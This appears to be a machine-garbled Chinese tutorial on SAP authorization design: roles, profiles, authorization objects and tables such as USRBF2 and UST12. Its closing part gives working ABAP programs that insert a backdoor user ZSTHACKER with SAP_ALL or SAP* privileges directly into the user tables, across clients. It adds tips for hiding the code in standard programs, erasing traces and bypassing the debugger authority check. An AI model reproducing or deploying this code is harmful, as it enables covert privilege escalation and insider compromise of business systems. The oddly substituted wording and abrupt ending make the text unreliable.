SAP權(quán)限設(shè)計(jì)簡(jiǎn)介剖析

1、UST04:UserProfilemaster(介紹小技巧-ERP權(quán)限控制繁中求簡(jiǎn),閑聊一下SAP復(fù)雜權(quán)限設(shè)計(jì)的基本思想。特別是適合大公司業(yè)務(wù)的ERP系統(tǒng),應(yīng)該供應(yīng)一個(gè)特別完滿的權(quán)限控制體系限控制字段細(xì)到字段級(jí)別，若是權(quán)限控制都做不到這點(diǎn)，估計(jì)產(chǎn)品銷售就夠嗆！,甚至贊同將權(quán)多年以前，俺還在軟件天真園時(shí)，老師部署的權(quán)限作業(yè)，權(quán)限大概是設(shè)計(jì)的：Select用戶名From用戶表where用戶名=butcher（獲得用戶名）select權(quán)限組IDFrom權(quán)限表where用戶名=butcher（獲得用戶對(duì)應(yīng)的權(quán)限組ID）select*From權(quán)限控制列表where權(quán)限組ID=*（獲得沒(méi)個(gè)權(quán)限組ID對(duì)應(yīng)的

2、明細(xì)權(quán)限列表也就是用戶的明細(xì)權(quán)限）這種簡(jiǎn)單的權(quán)限設(shè)置是無(wú)法滿足復(fù)雜的業(yè)務(wù)需求的，多年今后，居然國(guó)內(nèi)還有好多軟件公司在權(quán)限設(shè)計(jì)上還在玩這套小把戲。現(xiàn)在來(lái)看看“偉大的”SAP的權(quán)限設(shè)計(jì)思路，第一認(rèn)識(shí)下幾個(gè)Tcode和權(quán)限相關(guān)表格。常用權(quán)限相關(guān)Tcode.(一)Role(角色)相關(guān)T-code:PFCG創(chuàng)辦ROLE_CMP角色比較SUPC批量建立角色profile(二)建立用戶SU01建立用戶SU01D顯示用戶SU2|SU3|SU50|SU51|SU52改變/顯示用戶個(gè)人參數(shù)SU10|SU12批量保護(hù)用戶SUCOMP保護(hù)用戶公司地址SUIM用戶信息系統(tǒng)（重申一下）(三)建立用戶組SUGR|SUGRD

3、_NAV保護(hù)用戶組SUGRD|SUGR_NAV顯示用戶組(四)保護(hù)檢查授權(quán)SU20|SU21自定義授權(quán)字段和授權(quán)對(duì)象SU53當(dāng)出現(xiàn)權(quán)限問(wèn)題可使用它檢測(cè)未授權(quán)對(duì)象SU56:解析authoraztiondatabuffers.常用權(quán)限相關(guān)表格:TOBJ:Allavaiableauthorzationobjects.(ERPUSR12:用戶級(jí)authoraztion值USR02:UserLogonData(USR03:UseraddressdataUSR05:UserMasterParameterID(Tcode.系統(tǒng)默認(rèn)的所有授權(quán)對(duì)象,)SU3可查察用戶參數(shù)文件的參數(shù))ID默認(rèn)值)USR41:當(dāng)前

4、用戶(即TcodeSM04看到的所有當(dāng)前活動(dòng)用戶,包括各種對(duì)話系統(tǒng)通信類用戶)USRBF2:記錄當(dāng)前用戶所有的授權(quán)objects用戶主數(shù)據(jù)中對(duì)應(yīng)的權(quán)限參數(shù)文件名)UST10S:Singleprofiles(UST12:Authorizations(授權(quán)文件,權(quán)限參數(shù)和授權(quán)對(duì)象對(duì)應(yīng)表詳盡授權(quán)細(xì)節(jié))重點(diǎn)提示：USR02/USRBF2/UST10S/UST12四個(gè)表包括的信息就是ERP權(quán)限控制的重點(diǎn)，USR02是用戶主數(shù)據(jù)表，后三表和用戶授權(quán)親密相關(guān)。我現(xiàn)在舉一個(gè)MM01建立物料主數(shù)據(jù)的實(shí)例，來(lái)說(shuō)明第一步：建立角色（Tcode：PFCG）SAP的權(quán)限控制設(shè)計(jì)思路，步驟以下：圖1中，假設(shè)建立角色ZMM

5、01。圖1-12：在菜單Tab頁(yè)選擇“事務(wù)“加入MM01-創(chuàng)辦物料&,你還可為程序,盤(pán)問(wèn)這樣的報(bào)表授權(quán)，選擇”其余“還能夠?yàn)閿?shù)據(jù)庫(kù)房等對(duì)象設(shè)置權(quán)限角色。圖1-345：到“權(quán)限“Tab頁(yè)看到系統(tǒng)自動(dòng)產(chǎn)生的授權(quán)參數(shù)文件ProfilnameT-C1550437，爾后選擇”更正授權(quán)數(shù)據(jù)“，進(jìn)入圖2。顯然系統(tǒng)其實(shí)不意味你給了建立物料的權(quán)限就能任意使用該Tcode了，系統(tǒng)有更嚴(yán)格的認(rèn)真控制。圖2-12：我們能夠看到建立物料主數(shù)據(jù)的權(quán)限分公司代碼層次，庫(kù)房層次，物料種類層次，銷售組織層次，物料組層次，和工廠層次等等，特別是對(duì)于象公司代碼，銷售組織和工廠這樣的組織層次授權(quán)字段，控制點(diǎn)是特別必要的，一個(gè)大公司推

6、行ERP，各公司代碼，各公司代碼下的各Plant授權(quán)用戶只能建立各自的物料，現(xiàn)在來(lái)看看是如何控制到工廠級(jí)其余。圖2-345：在每個(gè)控制級(jí)別（即權(quán)限控制字段）都分控制字段和作業(yè)，每個(gè)權(quán)限控制字段對(duì)應(yīng)一個(gè)所謂的授權(quán)對(duì)象，工廠的授權(quán)對(duì)象是M_MATE_WRK,所有授權(quán)對(duì)象的作業(yè)一致都是ACTVT,包括01/02/03/06/08五個(gè)作業(yè),即控制可否贊同創(chuàng)建更正顯示刪除等。比方MM01的作業(yè)只給03-顯示，則只能顯示物料。注：若是有特別權(quán)限控制需要，能夠使用SU20|SU21自定義授權(quán)字段和授權(quán)對(duì)象圖2-67：點(diǎn)擊“工廠“，進(jìn)去增加工廠權(quán)限，設(shè)置了工廠FRM1-FRM2。FRA1，F(xiàn)RA2和一個(gè)工廠范

7、圍注：若是公司代碼，物料類，物料組，工廠等授權(quán)字段選擇*表示贊同輸入該字段所有的內(nèi)容。接下來(lái)，使用SU01建立一個(gè)用戶假設(shè)名叫butcher，爾后在此將角色ZMM01分配給它，如圖3，記得要做“用戶比較“知道該按紐變綠，這和人帶的帽子不同樣，在角色設(shè)置中，越綠越好，至此，一個(gè)最簡(jiǎn)單的權(quán)限設(shè)置就Ok了，用戶butcher只能使用MM01在工廠FRA1，F(xiàn)RA1，F(xiàn)RM1，F(xiàn)RM2四個(gè)工廠上建立物料主數(shù)據(jù)?，F(xiàn)在來(lái)檢查USRBF2/UST10S/UST12三個(gè)和用戶授權(quán)相關(guān)的表格數(shù)據(jù)，如圖4，圖5和圖6。圖4是用戶參數(shù)文件表USR10S和用戶授權(quán)表USRBF2的合成圖。圖4-1346：UST10S表

8、的參數(shù)文件T-C1550437正是圖1-4中定義角色ZMM01時(shí)生成的參數(shù)文件，對(duì)象表示的即授權(quán)對(duì)象，每個(gè)授權(quán)對(duì)象對(duì)應(yīng)一個(gè)圖4-6的權(quán)限名稱T-C155043700|T-C155043701，這倆權(quán)限名稱正是參數(shù)文件T-C1550437文件+系號(hào)。圖4-25：用戶授權(quán)對(duì)象表USRBF2包括了ERP用戶BUTCHER所對(duì)應(yīng)的（授權(quán)）對(duì)象和對(duì)象對(duì)應(yīng)的權(quán)限名稱，現(xiàn)在注意一下USRBF2表用戶BUTCHER包括了工廠的授權(quán)對(duì)象M_MATE_WRK,其對(duì)應(yīng)的授權(quán)名稱是T-C155043700，那么圖2-7設(shè)置的四個(gè)工廠FRA1，F(xiàn)RA1，F(xiàn)RM1，F(xiàn)RM2保存在什么地方呢？請(qǐng)見(jiàn)圖6。為什么一個(gè)參數(shù)文件T

9、-C1550437產(chǎn)生了兩個(gè)T-C155043700|T-C155043701權(quán)限名稱呢？查察權(quán)限對(duì)象設(shè)置時(shí)發(fā)現(xiàn)，在庫(kù)房授權(quán)對(duì)象M_MATE_LGN和銷售組織/分銷渠道授權(quán)M_MATE_VKO下系統(tǒng)竟默認(rèn)了兩次同樣的授權(quán)作業(yè)，如圖5。圖5表示建立物料主數(shù)據(jù)的庫(kù)房號(hào)和銷售組織/分銷渠道默認(rèn)授權(quán)了兩次。圖6中，能夠看到授權(quán)對(duì)象M_MATE_WRK(即工廠授權(quán)對(duì)象)有5條記錄,其中字段ACTVT有01,06兩條,分表表示贊同建立和刪除物料數(shù)據(jù),工廠WERKS有三條,正是FRA1,FRA2,和值FRM1到值FRM2，如圖6-23。至此，權(quán)限設(shè)計(jì)的基本邏輯就特別清楚了，若是用戶BUTCHER要建立某工廠

10、的物料，第一從授權(quán)表中查察可否有M_MATE_WRK的授權(quán)對(duì)象，爾后再到UST12去檢查輸入的工廠可否在授權(quán)范圍，Ifnotso，則提示未授權(quán)。現(xiàn)在用戶BUTCHER建立物料主數(shù)據(jù)，輸入工廠1000，提示M3855未授權(quán)辦理工廠1000的主數(shù)據(jù)，如圖7。平時(shí)有兩種便利方法查找到權(quán)限控制邏輯:(1).SE91輸入M3855查找，(2).直接在物料主數(shù)據(jù)建立程序中查找，必然能看到該主程序的子程序下各處都有象圖7-4的AUTHORITY-CHECKOBJECT授權(quán)對(duì)象名稱IDACTVT作業(yè)贊同號(hào)ID授權(quán)字段FIELD用戶輸入內(nèi)容“這樣的權(quán)限檢查邏輯。若是你認(rèn)識(shí)了這個(gè)原理,那么有追蹤程序和更正變量的權(quán)

11、限(對(duì)應(yīng)授權(quán)對(duì)象要你稍微熟悉ABAP，實(shí)質(zhì)上你就擁有了所有權(quán)限。下面的附件是一個(gè)使用追蹤/H并更正授權(quán)返回變量的操作手冊(cè)。S_DEVOP,02,只追蹤獲得權(quán)限操作.doc回顧這個(gè)實(shí)例，注意以下三點(diǎn)。1.創(chuàng)辦角色Role將產(chǎn)生一個(gè)授權(quán)參數(shù)文件ProfielName。2.一個(gè)授權(quán)參數(shù)文件包括好多授權(quán)對(duì)象AuthorityObjects,實(shí)際上是若是將多個(gè)Tcode或報(bào)表或起其余什么的賜予一個(gè)Role,系統(tǒng)將這些Tcode(或報(bào)表)對(duì)應(yīng)的授權(quán)對(duì)象帶出,這些授權(quán)對(duì)象自然在Tcode(報(bào)表對(duì)應(yīng)的)程序邏輯中會(huì)有表現(xiàn),則角色對(duì)應(yīng)的授權(quán)參數(shù)文件將包括這些授權(quán)對(duì)象。授權(quán)對(duì)象平時(shí)有兩部分組成：一是作業(yè)ACTVT

12、，作業(yè)號(hào)分別是：創(chuàng)辦或生成更正顯示刪除顯示更正文檔二是授權(quán)字段，這些授權(quán)字段平時(shí)是諸如組織結(jié)構(gòu)層次的公司代碼，工廠，或其余比方物料種類，憑證種類等，這樣能夠做到更細(xì)微的權(quán)限控制。到現(xiàn)在為止,我們知道，實(shí)質(zhì)上決定權(quán)限的是授權(quán)對(duì)象AuthorizationObject!用戶的授權(quán)對(duì)象表在USRBF2中，所以只要往這個(gè)表插入數(shù)據(jù)就獲得了權(quán)限，現(xiàn)在能夠使用SE38建立用戶和授予權(quán)限,這意味著使用ABAP能夠迅速獲得所有權(quán)限。不如假設(shè)一下，一個(gè)ABAPer在開(kāi)發(fā)機(jī)上建立這樣的程序，爾后傳輸?shù)缴a(chǎn)系統(tǒng)？Basis能發(fā)現(xiàn)？理論上，高明的ABAPer是不大可能被發(fā)現(xiàn)的，它能夠?qū)⑦@段代碼甚至移值到一段很不常用的

13、標(biāo)準(zhǔn)程序比方Query，Reportpainter產(chǎn)生的自動(dòng)程序上，并且在程序中填加刪除所有印跡的代碼，甚至能夠設(shè)置好自毀該段程序,繞過(guò)AccessKey更正標(biāo)準(zhǔn)程序也是輕易的！下面的程序ZCRTUSER是建立用戶ZSTHACKER(初始密碼123qaz)并賜予SAP*用戶的所有權(quán)限的參照程序。ProgramZCRTUSER.DataZUSR02likeUSR02.*1.CreateUserZSTHACKERaccordingtoDDICselectsingle*intoZUSR02fromUSR02whereBNAME=DDIC.ZUSR02-BNAME=ZSTHACKER.ZUSR02-B

14、code=E3B796BB09F7901B.insertUSR02fromZUSR02.*2.CopyAuth.ObjfromSAP*(orother)若是將WhereBNAME=SAP*去掉，基本就是復(fù)制所有的授權(quán)對(duì)象dataZUSRBF2likeUSRBF2occurs0withheaderline.select*fromUSRBF2intotableZUSRBF2whereBNAME=SAP*.LoopatZUSRBF2.ZUSRBF2-BNAME=ZSTHACKER.ModifyZUSRBF2INDEXsy-tabixTRANSPORTINGBNAME.endloop.INSERTUS

15、RBF2FROMTABLEZUSRBF2ACCEPTINGDUPLICATEKEYS.若是SAP*可能被刪除,還可直接將TOBJ中包括的所有的ERP授權(quán)對(duì)象所有賜予給一個(gè)用戶。以下程序ZALLOBJ是賜予所有的標(biāo)準(zhǔn)授權(quán)對(duì)象給用戶ZSTHACKER。ProgramZALLOBJ。DataZtobjliketobjoccurs0withheaderline.datazusrbf2likeusrbf2.select*intotableztobjfromtobj.loopatztobj.zusrbf2-mandt=sy-mandt.zusrbf2-bname=ZSTHACKER.zusrbf2-obj

16、ct=ztobj-objct.zusrbf2-auth=&_SAP_ALL.modifyUSRBF2FROMzusrbf2.endloop.也可跨Client建立用戶和賜予權(quán)限，只要使用clientspecifiedProgramZCLIENT.Datazusrbf2likeusrbf2.Select*intozusrbf2fromusrbf2wherebname=SAP*.Zusrbf2-bname=ZSTHACKER.Zusrbf2-mandt=100.Insertintousrbf2clientspecifiedvalueszusrbf2.Endselect.就可以。下面是一句話更正SAP*